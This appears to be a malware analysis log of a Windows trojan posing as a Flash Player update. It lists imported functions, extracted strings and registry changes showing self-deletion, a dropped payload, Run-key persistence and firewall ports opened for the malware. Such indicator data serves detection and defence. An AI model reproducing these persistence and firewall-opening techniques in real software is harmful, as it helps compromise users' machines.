0041EA80 DdeSetUserHandle USER32
0041EA84 SetWindowWord USER32
0041EA88 SetDlgItemTextW USER32
0041EA8C IsMenu USER32
0041EA90 SetWindowTextW USER32
0041EA94 GetSystemMenu USER32
0041EA98 RegisterClassA USER32
0041EA9C ChangeDisplaySettingsExW USER32
0041EAA0 SetMenuInfo USER32
0041EAA4 GetKeyState USER32
0041EAA8 ChildWindowFromPoint USER32
0041EAAC LoadCursorFromFileW USER32
0041EAB0 SendMessageCallbackA USER32
0041EAB4 DdeKeepStringHandle USER32
0041EAB8 FlashWindow USER32
0041EABC OpenIcon USER32
0041EAC0 CreateMenu USER32
0041EAC4 FindWindowW USER32
0041EAC8 GetIconInfo USER32
0041EACC GetWindowInfo USER32
0041EAD0 IsCharAlphaNumericA USER32
0041EAD4 FrameRect USER32
0041EAD8 FlashWindowEx USER32
0041EADC SetSysColors USER32
0041EAE0 GetCapture USER32
0041EAE4 DdeGetLastError USER32
0041EAE8 SetWindowsHookA USER32
0041EAEC PostThreadMessageA USER32
0041EAF0 TranslateMessage USER32
0041EAF4 GetDlgItemTextA USER32
0041EAF8 GetShellWindow USER32
0041EAFC CreateAcceleratorTableW USER32
0041EB00 DrawMenuBar USER32
0041EB04 DdeDisconnect USER32
0041EB08 SetClipboardData USER32
0041EB0C CreateDialogParamW USER32
0041EB10 ToUnicodeEx USER32
0041EB14 CreatePopupMenu USER32
0041EB18 IMPQueryIMEA USER32
0041EB1C CloseWindowStation USER32
0041EB20 GetGuiResources USER32
0041EB24 GetPropW USER32
0041EB28 SetActiveWindow USER32
0041EB2C CharNextExA USER32
0041EB30 IsRectEmpty USER32
0041EB34 LockSetForegroundWindow USER32
0041EB38 SetScrollRange USER32
0041EB3C EnumPropsExW USER32
0041EB40 PostMessageA USER32
0041EB44 GetClassInfoExW USER32
0041EB48 UpdateWindow USER32
0041EB4C GetFocus USER32
0041EB50 GetWindow USER32
0041EB54 PaintDesktop USER32
0041EB58 GetKeyboardLayout USER32
0041EB5C ChangeMenuA USER32
0041EB60 GetThreadDesktop USER32
0041EB64 CharLowerBuffW USER32
0041EB6C RegOpenKeyExW ADVAPI32
--------------
stringzzz
--------------
.text:004157E4 00000013 C 3「H4j.JYb-菫ツ\n驟ヘ
.data:0041C02C 0000000C C CreateFileW
.data:0041C038 00000009 C kernel32
.data:0041EB76 0000000A C GetCPInfo
.data:0041EB82 0000000D C VirtualAlloc
.data:0041EB92 0000000D C LoadLibraryA
.data:0041EBA2 0000000F C GetProcAddress
.data:0041EBB4 00000015 C GetWindowsDirectoryW
.data:0041EBCC 00000009 C lstrcatW
.data:0041EBD8 0000000C C CreateFileW
.data:0041EBE4 0000000D C KERNEL32.dll
.data:0041EBF4 0000000A C LoadIconA
.data:0041EC00 00000013 C CreateIconIndirect
.data:0041EC16 0000000D C GetDlgCtrlID
.data:0041EC26 0000000D C GetScrollPos
.data:0041EC36 0000001C C RegisterDeviceNotificationA
.data:0041EC54 00000012 C DdeEnableCallback
.data:0041EC68 0000000B C DrawStateA
.data:0041EC76 00000014 C MessageBoxIndirectW
.data:0041EC8C 0000000A C LoadMenuA
.data:0041EC98 00000015 C GetTabbedTextExtentA
.data:0041ECB0 00000010 C UnpackDDElParam
.data:0041ECC2 00000018 C DialogBoxIndirectParamW
.data:0041ECDC 0000000A C ToAsciiEx
.data:0041ECE8 00000009 C IsWindow
.data:0041ECF4 00000014 C LoadKeyboardLayoutA
.data:0041ED0A 0000000A C GetCursor
.data:0041ED16 00000016 C UserHandleGrantAccess
.data:0041ED2E 0000000D C GetMenuState
.data:0041ED3E 00000011 C SetMenuItemInfoA
.data:0041ED52 0000000F C TabbedTextOutW
.data:0041ED64 0000000C C mouse_event
.data:0041ED72 00000011 C DdeSetUserHandle
.data:0041ED86 0000000E C SetWindowWord
.data:0041ED96 00000010 C SetDlgItemTextW
.data:0041EDA8 00000007 C IsMenu
.data:0041EDB2 0000000F C SetWindowTextW
.data:0041EDC4 0000000E C GetSystemMenu
.data:0041EDD4 0000000F C RegisterClassA
.data:0041EDE6 00000019 C ChangeDisplaySettingsExW
.data:0041EE02 0000000C C SetMenuInfo
.data:0041EE10 0000000C C GetKeyState
.data:0041EE1E 00000015 C ChildWindowFromPoint
.data:0041EE36 00000014 C LoadCursorFromFileW
.data:0041EE4C 00000015 C SendMessageCallbackA
.data:0041EE64 00000014 C DdeKeepStringHandle
.data:0041EE7A 0000000C C FlashWindow
.data:0041EE88 00000009 C OpenIcon
.data:0041EE94 0000000B C CreateMenu
.data:0041EEA2 0000000C C FindWindowW
.data:0041EEB0 0000000C C GetIconInfo
.data:0041EEBE 0000000E C GetWindowInfo
.data:0041EECE 00000014 C IsCharAlphaNumericA
.data:0041EEE4 0000000A C FrameRect
.data:0041EEF0 0000000E C FlashWindowEx
.data:0041EF00 0000000D C SetSysColors
.data:0041EF10 0000000B C GetCapture
.data:0041EF1E 00000010 C DdeGetLastError
.data:0041EF30 00000010 C SetWindowsHookA
.data:0041EF42 00000013 C PostThreadMessageA
.data:0041EF58 00000011 C TranslateMessage
.data:0041EF6C 00000010 C GetDlgItemTextA
.data:0041EF7E 0000000F C GetShellWindow
.data:0041EF90 00000018 C CreateAcceleratorTableW
.data:0041EFAA 0000000C C DrawMenuBar
.data:0041EFB8 0000000E C DdeDisconnect
.data:0041EFC8 00000011 C SetClipboardData
.data:0041EFDC 00000013 C CreateDialogParamW
.data:0041EFF2 0000000C C ToUnicodeEx
.data:0041F000 00000010 C CreatePopupMenu
.data:0041F012 0000000D C IMPQueryIMEA
.data:0041F022 00000013 C CloseWindowStation
.data:0041F038 00000010 C GetGuiResources
.data:0041F04A 00000009 C GetPropW
.data:0041F056 00000010 C SetActiveWindow
.data:0041F068 0000000C C CharNextExA
.data:0041F076 0000000C C IsRectEmpty
.data:0041F084 00000018 C LockSetForegroundWindow
.data:0041F09E 0000000F C SetScrollRange
.data:0041F0B0 0000000D C EnumPropsExW
.data:0041F0C0 0000000D C PostMessageA
.data:0041F0D0 00000010 C GetClassInfoExW
.data:0041F0E2 0000000D C UpdateWindow
.data:0041F0F2 00000009 C GetFocus
.data:0041F0FE 0000000A C GetWindow
.data:0041F10A 0000000D C PaintDesktop
.data:0041F11A 00000012 C GetKeyboardLayout
.data:0041F12E 0000000C C ChangeMenuA
.data:0041F13C 00000011 C GetThreadDesktop
.data:0041F150 0000000F C CharLowerBuffW
.data:0041F160 0000000B C USER32.dll
.data:0041F16E 0000000E C RegOpenKeyExW
.data:0041F17C 0000000D C ADVAPI32.dll
.rsrc:00420004 00000005 C *&~P
.rsrc:0042002C 00000005 C *&~P
.rsrc:004200BC 00000005 C *&~P
.rsrc:004200E4 00000005 C *&~P
.rsrc:0042010C 00000005 C *&~P
.rsrc:00420134 00000005 C *&~P
.rsrc:0042015C 00000005 C *&~P
.rsrc:00420184 00000005 C *&~P
.rsrc:004201AC 00000005 C *&~P
.rsrc:004201D4 00000005 C *&~P
.rsrc:004201FC 00000005 C *&~P
.rsrc:00420224 00000005 C *&~P
.rsrc:0042024C 00000005 C *&~P
.rsrc:00420274 00000005 C *&~P
.rsrc:0042029C 00000005 C *&~P
.rsrc:004202C4 00000005 C *&~P
.rsrc:004202EC 00000005 C *&~P
.rsrc:00420314 00000005 C *&~P
.rsrc:0042033C 00000005 C *&~P
.rsrc:004203BC 00000005 C *&~P
.rsrc:004203E4 00000005 C *&~P
.rsrc:0042040C 00000005 C *&~P
.rsrc:00420434 00000005 C *&~P
.rsrc:0042045C 00000005 C *&~P
.rsrc:00420484 00000005 C *&~P
.rsrc:004204AC 00000005 C *&~P
.rsrc:004204D4 00000005 C *&~P
.rsrc:004204FC 00000005 C *&~P
.rsrc:00420524 00000005 C *&~P
.rsrc:0042054C 00000005 C *&~P
.rsrc:00420574 00000005 C *&~P
.rsrc:0042059C 00000005 C *&~P
.rsrc:004205C4 00000005 C *&~P
.rsrc:004205EC 00000005 C *&~P
.rsrc:00420604 00000005 C *&~P
.rsrc:004207D9 0000000D C wwwwwwwwwwwwx
.rsrc:004207E9 0000000D C wwwwwwwwwwwwx
.rsrc:004207F9 0000000D C w\"wwwwwwwxwwx
.rsrc:0042080B 00000006 C wwwwp
.rsrc:00420819 00000007 C wwwwwwx
.rsrc:00420829 0000000D C wwwwwwwwwwwwx
.rsrc:0042087B 0000000A C wwwwwwwwwx
.rsrc:0042096B 0000000A C wwwwwwwwwx
.rsrc:0042098A 0000000A C \bwwwwwwwww
.rsrc:0042099C 00000009 C wwpwwwwww
.rsrc:00420AD1 0000000E C wwwwwwwwwwwwww
.rsrc:00420C11 0000000E C wwwwwwwwwwwwww
.rsrc:00420C21 0000000B C DDDDDDDDD@
.rsrc:00420C31 0000000E C DDDDDDDDDGpw\ap
.rsrc:00420C41 0000000E C DDDDDDDDDGpw\ap
.rsrc:00420C51 0000000E C DDDDDDDDDDDDDD
.rsrc:00420C61 0000000E C wwwwwwwwwwwwww
.rsrc:00420DE9 00000006 C DDDDDD
.rsrc:00420DF1 00000006 C wwwwww
.rsrc:00420ECA 00000006 C /
.rsrc:00420ED2 00000006 C \"\"\"\"/
.rsrc:00420EDA 00000006 C /
.rsrc:00420EE2 00000006 C \"\"\"\"/
.rsrc:00420EEA 00000006 C /
.rsrc:00420EF2 00000006 C \"\"\"\"/
.rsrc:00420EFA 00000006 C /
.rsrc:00420F02 00000006 C \"\"\"\"/
.rsrc:00420F0A 00000006 C /
.rsrc:00420F12 00000006 C \"\"\"\"/
.rsrc:00420F1A 00000006 C /
.rsrc:00420FFA 00000006 C \"\"\"\"/
.rsrc:00421002 00000006 C /
.rsrc:0042100A 00000006 C \"\"\"\"/
.rsrc:00421012 00000006 C /
.rsrc:0042101A 00000006 C \"\"\"\"/
.rsrc:00421022 00000006 C /
.rsrc:0042102A 00000006 C \"\"\"\"/
.rsrc:00421032 00000006 C /
.rsrc:0042103A 00000006 C \"\"\"\"/
.rsrc:00421042 00000006 C /
.rsrc:0042112A 00000006 C /
.rsrc:00421132 00000006 C \"\"\"\"/
.rsrc:0042113A 00000006 C /
.rsrc:00421142 00000006 C \"\"\"\"/
.rsrc:0042114A 00000006 C /
.rsrc:00421152 00000006 C \"\"\"\"/
.rsrc:0042115A 00000006 C /
.rsrc:00421162 00000006 C \"\"\"\"/
.rsrc:0042116A 00000006 C /
.rsrc:0042125A 00000006 C \"\"\"\"/
.rsrc:00421262 00000006 C /
.rsrc:0042126A 00000006 C \"\"\"\"/
.rsrc:00421272 00000006 C /
.rsrc:0042127A 00000006 C \"\"\"\"/
.rsrc:00421282 00000006 C /
.rsrc:0042128A 00000006 C \"\"\"\"/
.rsrc:00421292 00000006 C /
.rsrc:0042138A 00000006 C /
.rsrc:00421392 00000006 C \"\"\"\"/
.rsrc:0042139A 00000006 C /
.rsrc:004213A2 00000006 C \"\"\"\"/
.rsrc:004213AA 00000006 C /
.rsrc:004213B2 00000006 C \"\"\"\"/
.rsrc:004213BA 00000006 C /
.rsrc:004214BA 00000006 C \"\"\"\"/
.rsrc:004214C2 00000006 C /
.rsrc:004214CA 00000006 C \"\"\"\"/
.rsrc:004214D2 00000006 C /
.rsrc:004214DA 00000006 C \"\"\"\"/
.rsrc:004214E2 00000006 C /
.rsrc:004215EA 00000006 C /
.rsrc:004215F2 00000006 C \"\"\"\"/
.rsrc:004215FA 00000006 C /
.rsrc:00421602 00000006 C \"\"\"\"/
.rsrc:0042160A 00000006 C /
.rsrc:0042171A 00000006 C \"\"\"\"/
.rsrc:00421722 00000006 C /
.rsrc:0042172A 00000006 C \"\"\"\"/
.rsrc:00421732 00000006 C /
.rsrc:0042184A 00000006 C /
.rsrc:00421852 00000006 C \"\"\"\"/
.rsrc:0042185A 00000006 C /
.rsrc:0042197A 00000006 C \"\"\"\"/
.rsrc:00421982 00000006 C /
.rsrc:00421AAA 00000006 C /
=====================
behavior check:
=====================
Self deleted,
drops: 1154656.exe payload (self copied), and using CMD command to self exec
see pic. https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg
REGISTRY:
----------------------------------
Keys added:26
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Sufyil
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\WAB\WAB4\Wab File Name
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Sysinternals\Process Explorer
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\WinRAR
----------------------------------
Values added:112
----------------------------------
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\RemoteAccess\Performance\Error Count: 0x00000002
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Control\ActiveService: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Service: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\0000\DeviceDesc: "PROCEXP141"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PROCEXP141\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\RemoteAccess\Performance\Error Count: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\24599:UDP: "24599:UDP:*:Enabled:UDP 24599"
HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\14780:TCP: "14780:TCP:*:Enabled:TCP 14780"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Identities\{8050BE41-0268-42B2-900E-11DE9FEDDDF7}\Identity Ordinal: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Applets\Paint\Recent File List\File2: "C:\Documents and Settings\rik\デスクトップ\001.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU\b: 72 00 65 00 67 00 73 00 68 00 6F 00 74 00 2E 00 65 00 78 00 65 00 00 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 72 00 69 00 6B 00 5C 00 C7 30 B9 30 AF 30 C8 30 C3 30 D7 30 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\b: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*\c: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\bmp\b: "C:\Documents and Settings\rik\デスクトップ\002.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\a: "C:\Documents and Settings\rik\デスクトップ\shot001.hiv"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\hiv\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\a: "regshot.exe"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hiv\OpenWithList\MRUList: "a"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.bmp\1: 30 00 30 00 32 00 2E 00 62 00 6D 00 70 00 00 00 3C 00 32 00 00 00 00 00 00 00 00 00 00 00 30 30 32 2E 6C 6E 6B 00 26 00 03 00 04 00 EF BE 00 00 00 00 00 00 00 00 14 00 00 00 30 00 30 00 32 00 2E 00 6C 00 6E 00 6B 00 00 00 16 00 00 00
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:Jverfunex.yax: 01 00 00 00 06 00 00 00 B0 03 DE 89 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Cebtenz Svyrf\Jverfunex\jverfunex.rkr: 01 00 00 00 06 00 00 00 40 37 10 8A 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\cebprkc.rkr: 01 00 00 00 06 00 00 00 C0 26 FC 92 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\evx\デスクトップ\hcqngr_synfu_cynlre.rkr: 01 00 00 00 06 00 00 00 60 3E 40 BF 1D AC CD 01
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\CurrentVersion\Run\{006579CE-45C4-AD42-587D-A196614C8284}: ""C:\Documents and Settings\rik\Application Data\Zeon\azys.exe""
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\procexp.exe: "Sysinternals Process Explorer"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\rik\デスクトップ\update_flash_player.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\842656.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\851468.exe: "Windows TaskManager"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\rik\LOCALS~1\Temp\abcd.bat: "abcd"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server ID: 0x00000003
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\Account Name: "WhoWhere インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Server: "ldap.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP URL: "http://www.whowhere.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server ID: 0x00000002
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\Account Name: "VeriSign インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Server: "directory.verisign.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP URL: "http://www.verisign.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Search Base: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server ID: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\Account Name: "Bigfoot インターネット ディレクトリ サービス"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Server: "ldap.bigfoot.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP URL: "http://www.bigfoot.com"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Authentication: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Simple Search: 0x00000001
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server ID: 0x00000000
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\Account Name: "Active Directory"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Server: "NULL"
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Search Return: 0x00000064
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Timeout: 0x0000003C
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\LDAP Authentication: 0x00000002
